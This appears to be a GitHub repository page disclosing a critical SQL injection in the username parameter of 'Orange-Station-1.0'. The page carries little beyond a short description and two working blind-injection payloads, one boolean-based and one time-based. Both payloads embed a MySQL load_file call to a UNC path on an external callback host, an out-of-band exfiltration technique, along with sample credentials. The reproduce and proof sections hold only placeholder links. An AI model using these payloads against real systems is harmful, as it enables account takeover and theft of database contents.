Skip to content

Latest commit

 

History

History

Orange-Station-1.0

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 

Description:

The username parameter appears to be vulnerable to SQL injection attacks. The attacker can take administrator accounts control and also of all accounts, also the malicious user can download all information about this system.

Status: CRITICAL

[+] Payloads:

---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: username=mayuri.infospace@gmail.com'+(select load_file('\\\\kh5oq0o5iyhgxexnhrx8pzcwyn4hs8mwdz1rohc6.beauty.com\\jlb'))+'' OR NOT 8287=8287 AND 'jOHi'='jOHi&password=rootadmin&login=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=mayuri.infospace@gmail.com'+(select load_file('\\\\kh5oq0o5iyhgxexnhrx8pzcwyn4hs8mwdz1rohc6.beauty.com\\jlb'))+'' AND (SELECT 3074 FROM (SELECT(SLEEP(15)))cvLH) AND 'yPPS'='yPPS&password=rootadmin&login=
---

Reproduce:

href

Proof and Exploit:

href